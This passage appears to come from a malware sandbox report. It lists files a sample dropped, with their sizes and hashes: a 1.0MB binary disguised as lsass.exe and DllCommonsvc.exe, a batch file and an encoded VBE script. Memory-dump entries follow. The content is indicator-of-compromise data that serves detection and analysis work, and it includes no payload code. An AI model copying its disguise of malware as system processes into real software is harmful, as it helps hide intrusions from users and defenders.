                                  f8c51ff3ff909531d9469d4ba1bbabae101853ff

                                  SHA256

                                  b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

                                  SHA512

                                  f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

                                • C:\odt\lsass.exe

                                  Filesize

                                  1.0MB

                                  MD5

                                  bd31e94b4143c4ce49c17d3af46bcad0

                                  SHA1

                                  f8c51ff3ff909531d9469d4ba1bbabae101853ff

                                  SHA256

                                  b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

                                  SHA512

                                  f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

                                • C:\odt\lsass.exe

                                  Filesize

                                  1.0MB

                                  MD5

                                  bd31e94b4143c4ce49c17d3af46bcad0

                                  SHA1

                                  f8c51ff3ff909531d9469d4ba1bbabae101853ff

                                  SHA256

                                  b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

                                  SHA512

                                  f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

                                • C:\odt\lsass.exe

                                  Filesize

                                  1.0MB

                                  MD5

                                  bd31e94b4143c4ce49c17d3af46bcad0

                                  SHA1

                                  f8c51ff3ff909531d9469d4ba1bbabae101853ff

                                  SHA256

                                  b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

                                  SHA512

                                  f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

                                • C:\odt\lsass.exe

                                  Filesize

                                  1.0MB

                                  MD5

                                  bd31e94b4143c4ce49c17d3af46bcad0

                                  SHA1

                                  f8c51ff3ff909531d9469d4ba1bbabae101853ff

                                  SHA256

                                  b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

                                  SHA512

                                  f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

                                • C:\odt\lsass.exe

                                  Filesize

                                  1.0MB

                                  MD5

                                  bd31e94b4143c4ce49c17d3af46bcad0

                                  SHA1

                                  f8c51ff3ff909531d9469d4ba1bbabae101853ff

                                  SHA256

                                  b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

                                  SHA512

                                  f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

                                • C:\providercommon\1zu9dW.bat

                                  Filesize

                                  36B

                                  MD5

                                  6783c3ee07c7d151ceac57f1f9c8bed7

                                  SHA1

                                  17468f98f95bf504cc1f83c49e49a78526b3ea03

                                  SHA256

                                  8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

                                  SHA512

                                  c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

                                • C:\providercommon\DllCommonsvc.exe

                                  Filesize

                                  1.0MB

                                  MD5

                                  bd31e94b4143c4ce49c17d3af46bcad0

                                  SHA1

                                  f8c51ff3ff909531d9469d4ba1bbabae101853ff

                                  SHA256

                                  b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

                                  SHA512

                                  f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

                                • C:\providercommon\DllCommonsvc.exe

                                  Filesize

                                  1.0MB

                                  MD5

                                  bd31e94b4143c4ce49c17d3af46bcad0

                                  SHA1

                                  f8c51ff3ff909531d9469d4ba1bbabae101853ff

                                  SHA256

                                  b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

                                  SHA512

                                  f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

                                • C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

                                  Filesize

                                  197B

                                  MD5

                                  8088241160261560a02c84025d107592

                                  SHA1

                                  083121f7027557570994c9fc211df61730455bb5

                                  SHA256

                                  2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

                                  SHA512

                                  20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

                                • memory/808-167-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/808-188-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/832-206-0x00007FF970260000-0x00007FF970D21000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/832-208-0x00007FF970260000-0x00007FF970D21000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/860-163-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/860-198-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/916-182-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/916-168-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1316-159-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1316-139-0x0000000000920000-0x0000000000A30000-memory.dmp

                                  Filesize

                                  1.1MB

                                • memory/1316-140-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1488-217-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1488-213-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1780-164-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1780-191-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1904-194-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1904-170-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/2220-165-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/2220-179-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/2340-259-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/2340-255-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/2476-269-0x00007FF9705F0000-0x00007FF9710B1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/2500-224-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/2500-220-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/2700-187-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/2700-162-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/2800-238-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/2800-234-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3528-177-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3528-154-0x0000026262AB0000-0x0000026262AD2000-memory.dmp

                                  Filesize

                                  136KB

                                • memory/3528-160-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3612-252-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3612-248-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3688-181-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3688-161-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3876-183-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3876-158-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4144-202-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4144-172-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4208-171-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4208-186-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4212-169-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4212-196-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4216-231-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4216-227-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4292-241-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4292-245-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4320-166-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4320-192-0x00007FF970890000-0x00007FF971351000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/5004-262-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/5004-266-0x00007FF970380000-0x00007FF970E41000-memory.dmp

                                  Filesize

                                  10.8MB

                                We care about your privacy.

                                This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.